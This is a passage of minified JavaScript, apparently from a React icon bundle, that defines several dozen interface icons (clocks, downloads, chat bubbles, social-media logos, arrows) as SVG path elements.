1h2"})),category_file_documents_4_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 20V5a1 1 0 0 1 1-1h5.586a1 1 0 0 1 .707.293L11.5 6.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8 6.5h10a2 2 0 0 1 2 2V11M6 11l-4 9h16l4-9H6Z"})),clock_reading_time_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 6v6l4 2"})),clock_reading_time_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M12 2v1.5M2 12h1.5M12 22v-1.5M22 12h-1.5M13 13 9.5 9.5M11 13l5-5"})),clock_reading_time_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 13.5V16a6 6 0 0 1-6 6H2v-7a6 6 0 0 1 6-6h1"}),(0,o.createElement)("circle",{cx:"15.5",cy:"8.5",r:"6.5",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 5.111V9l2 1.111M6 15h3m-3 3h7"})),confused_emoji_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 10v1.5m7-1.5v1.5M9 17c.778-.839 3.267-2.516 7-1.845"})),correct_save_check_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 12.5 2.5 2.5L16 9"})),correct_save_check_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m4.5 13 5 5 10-12"})),cross_close_x_minimize_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 8 8 8m0-8-8 8"})),cross_x_close_minimize_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"m6 6 6 6m0 0 6 6m-6-6 6-6m-6 6-6 6"})),desktop_monitor_computer_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 3H4a2 2 0 0 0-2 2v10a2 2 0 0 0 2 2h16a2 2 0 0 0 2-2V5a2 2 0 0 0-2-2ZM8 21h8m-4-4v4m0-7.5h.01"})),dot_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2C6.477 2 2 6.477 2 12s4.477 10 10 10 10-4.477 10-10S17.523 2 12 2Z",clipRule:"evenodd"})),download_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 15v4c0 1.1.9 2 2 2h14a2 2 0 0 0 2-2v-4m-4-6-5 5-5-5m5 3.8V2.5"})),download_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7.822 8.067A5 5 0 0 0 6 17.9m12.633-5.658A7 7 0 1 0 5.248 8.147M19 9.756a4.502 4.502 0 0 1-.195 8.552M12 13v8m0 0-2.5-2.5M12 21l2.5-2.5"})),facebook_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M16.5 8H14a2 2 0 0 0-2 2v11m-2-7h5"})),google_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"m21.882 10.459-.103-.428h-9.485v3.938h5.667c-.588 2.741-3.318 4.184-5.549 4.184-1.623 0-3.333-.67-4.465-1.746a6.25 6.25 0 0 1-1.4-2.021 6.152 6.152 0 0 1-.502-2.393c0-1.66.76-3.318 1.865-4.41 1.106-1.091 2.776-1.702 4.437-1.702 1.902 0 3.264.99 3.774 1.442l2.853-2.784C18.137 3.818 15.838 2 12.254 2 9.49 2 6.84 3.039 4.903 4.933 2.99 6.8 2 9.497 2 12s.937 5.066 2.79 6.946C6.77 20.952 9.574 22 12.46 22c2.627 0 5.117-1.01 6.892-2.842 1.745-1.803 2.647-4.3 2.647-6.915 0-1.101-.113-1.755-.118-1.784Z"})),growth_increase_up_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m20.2 7.8-7.7 7.7-4-4-5.7 5.7"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 7h6v6"})),hamicon_5_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 13a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2ZM5 6a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2ZM5 20a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"})),hamicon_6_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 13a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm0-7a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm0 14a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"})),happy_emoji_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 8v1.5m7-1.5v1.5M12 18a5 5 0 0 0 5-5H7a5 5 0 0 0 5 5Z"})),heart_love_wishlist_favourite_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m4.098 13.848 7.52 7.519a.542.542 0 0 0 .765 0l7.52-7.52a5.678 5.678 0 0 0 0-8.028 5.047 5.047 0 0 0-7.138 0l-.711.71a.076.076 0 0 1-.107 0l-.711-.71a5.047 5.047 0 0 0-7.138 0 5.678 5.678 0 0 0 0 8.029Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.334 7.48c.553 0 1.107.21 1.53.633.547.548.78 1.292.695 2.006"})),hemicon_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h11.5M4 19h16"})),hemicon_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h16M4 19h16"})),hemicon_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h11.5M4 19h8"})),hidden_hide_invisible_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17.862 5.999c-1.61-1.148-3.576-2-5.86-2-7 0-11 8-11 8s1.764 3.529 5 5.899m3 1.596a9.213 9.213 0 0 0 3 .505c7 0 11-8 11-8s-.867-1.734-2.5-3.587"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14 9.764A3 3 0 0 0 9.764 14m5.21-1.601a3.002 3.002 0 0 1-2.59 2.577M3.6 20.4 20.4 3.6"})),home_house_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3.671 9.403 7-6.222a2 2 0 0 1 2.658 0l7 6.222A2 2 0 0 1 21 10.898V19a2 2 0 0 1-2 2h-3.5a1 1 0 0 1-1-1v-5a1 1 0 0 0-1-1h-3a1 1 0 0 0-1 1v5a1 1 0 0 1-1 1H5a2 2 0 0 1-2-2v-8.102a2 2 0 0 1 .671-1.495Z"})),hourglass_timer_time_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 2v4.93a2 2 0 0 0 .89 1.664l4.555 3.036a1 1 0 0 0 1.11 0l4.554-3.036A2 2 0 0 0 18 6.93V2M6 22v-4.93a2 2 0 0 1 .89-1.664l4.555-3.036a1 1 0 0 1 1.11 0l4.554 3.036A2 2 0 0 1 18 17.07V22"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 2h16M4 22h16M9.5 19.5h5M11 17h2"})),instagram_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,o.createElement)("circle",{cx:"12",cy:"12",r:"4",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"2",d:"M17 7h.01"})),laptop_computer_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3.5 6a2 2 0 0 1 2-2h13a2 2 0 0 1 2 2v10h-17V6Zm7 1h3M2 16h20v2a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2v-2Z"})),left_align_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18M3 21h8m-8-6h18M3 9h8"})),left_triangle_angle_arrow_backward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6.067 12.8a1 1 0 0 1 0-1.6l9.333-7A1 1 0 0 1 17 5v14a1 1 0 0 1-1.6.8l-9.333-7Z"})),linkedin_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M7.75 10.25v6"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"2",d:"M7.75 7.75h.01"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M11.25 10.25v6m5 0v-3.5a2.5 2.5 0 0 0-5 0"})),link_chains_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m14.011 17.028-2.514 2.514a4.977 4.977 0 1 1-7.04-7.04L6.973 9.99M9.99 6.973l2.514-2.514a4.978 4.978 0 1 1 7.04 7.04l-2.515 2.513M9.5 14.5l5-5"})),location_gps_map_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"10",r:"3",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 10.205C20 17.385 12 22 12 22s-8-4.615-8-11.795C4 5.674 7.582 2 12 2s8 3.674 8 8.205Z"})),long_arrow_up_top_increase_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 21V3m0 0L6 9m6-6 6 6"})),mail_email_messege_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 6a2 2 0 0 1 2-2h16a2 2 0 0 1 2 2v12a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V6Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m6 8 4.8 3.6a2 2 0 0 0 2.4 0L18 8"})),media_document_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 21h14a2 2 0 0 0 2-2V8.828a2 2 0 0 0-.586-1.414l-3.828-3.828A2 2 0 0 0 15.172 3H5a2 2 0 0 0-2 2v14a2 2 0 0 0 2 2ZM8 9h4m-4 3h8m-8 3h6"})),messege_comment_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 7v15l5-4h13a2 2 0 0 0 2-2V7a2 2 0 0 0-2-2H4a2 2 0 0 0-2 2Zm7 3h4m-4 3h6"})),messege_comment_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2ZM9 9h4m-4 3h6"})),messege_comment_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2ZM8 11v-1m4 1v-1m4 1v-1"})),messege_comment_4_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2Z"})),messege_comment_5_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 12a9 9 0 1 1 9 9H3v-9Zm6-1.5h6m-6 3h6"})),messege_comment_6_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 16a4 4 0 0 1-4 4H2v-6a4 4 0 0 1 4-4"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 9a5 5 0 0 1 5-5h6a5 5 0 0 1 5 5v7H11a5 5 0 0 1-5-5V9Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 8.5h4m-4 3h6"})),messege_comment_7_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 20c5.523 0 10-3.806 10-8.5S17.523 3 12 3 2 6.806 2 11.5c0 2.78 1.571 5.25 4 6.8v3.2l3.211-1.835A11.66 11.66 0 0 0 12 20Zm-3-9.5h6m-5 3h4"})),messege_comment_8_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.5 18.703c-4.142 0-7.5-3.292-7.5-7.352C7 7.291 10.358 4 14.5 4c4.142 0 7.5 3.291 7.5 7.351 0 2.405-1.178 4.54-3 5.882V20l-2.408-1.587a7.645 7.645 0 0 1-2.092.29Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.352 5.55A7.131 7.131 0 0 0 8.5 5.5C4.91 5.5 2 8.174 2 11.473c0 1.954 1.021 3.69 2.6 4.779V18.5l2.087-1.29a7.04 7.04 0 0 0 2.813.166c.169-.024.336-.054.5-.09"})),messenger_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 22c5.523 0 10-4.477 10-10S17.523 2 12 2 2 6.477 2 12c0 1.834.494 3.553 1.355 5.03L2 22l4.818-1.445A9.954 9.954 0 0 0 12 22Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m7 13.75 3-3 3.5 3 3.5-3.5"})),microsoft_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Zm9-2v18m-9-9h18"})),middle_align_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18M8 21h8M3 15h18M8 9h8"})),mobile_smartphone_phone_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17 2H7a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h10a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2Zm-6.5 3h3"})),pause_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h2.5a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Zm11.5 0a2 2 0 0 1 2-2H19a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2h-2.5a2 2 0 0 1-2-2V5Z"})),pinterest_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 11 8 21m1.818-4.5A5 5 0 1 0 7.416 14"}),(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"})),play_media_video_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2c5.522 0 10 4.477 10 10s-4.478 10-10 10C6.477 22 2 17.523 2 12S6.477 2 12 2Z",clipRule:"evenodd"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m16 12-6-4v8l6-4Z"})),price_tag_label_category_sale_discount_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.328 2.5H20.5a1 1 0 0 1 1 1v8.172a2 2 0 0 1-.586 1.414l-8 8a2 2 0 0 1-2.829 0l-7.171-7.172a2 2 0 0 1 0-2.828l8-8a2 2 0 0 1 1.414-.586Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M18 7.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 13 3 3"})),price_tag_offer_sale_coupon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 5.5h-3.672a2 2 0 0 0-1.414.586l-6.5 6.5a2 2 0 0 0 0 2.828l6.171 6.172a2 2 0 0 0 2.829 0l6.5-6.5A2 2 0 0 0 20 13.672V6.5a1 1 0 0 0-1-1h-.5M8 14.5l3 3m-.5-4.5 2 2"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 9c4.5-2.5 1.655-7.99-2.766-6.817-2.752.73-5.916 1.27-9.234 0"})),reddit_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M12 9c-4.97 0-9 2.91-9 6.5S7.03 22 12 22s9-2.91 9-6.5S16.97 9 12 9Zm0 0V6a2 2 0 0 1 2-2h3m3.506 9.37a2.25 2.25 0 1 0-2.856-2.93M17 4a2 2 0 1 0 4 0 2 2 0 0 0-4 0ZM3.494 13.37a2.25 2.25 0 1 1 2.856-2.93"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M8.5 16.75c1.5 1.5 5.5 1.5 7 0M15 13h.01M9 13h.01"})),refresh_reset_cycle_loop_infinity_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M21 12a9 9 0 0 1-17 4.127M3 12a9 9 0 0 1 17-4.127M20 3v5h-5M4 21v-5h5"})),restriction_no_stop_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 19 19 5"})),right_align_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18m-8 18h8M3 15h18m-8-6h8"})),right_triangle_angle_play_arrow_forward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17.933 12.8a1 1 0 0 0 0-1.6L8.6 4.2A1 1 0 0 0 7 5v14a1 1 0 0 0 1.6.8l9.333-7Z"})),search_magnify_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 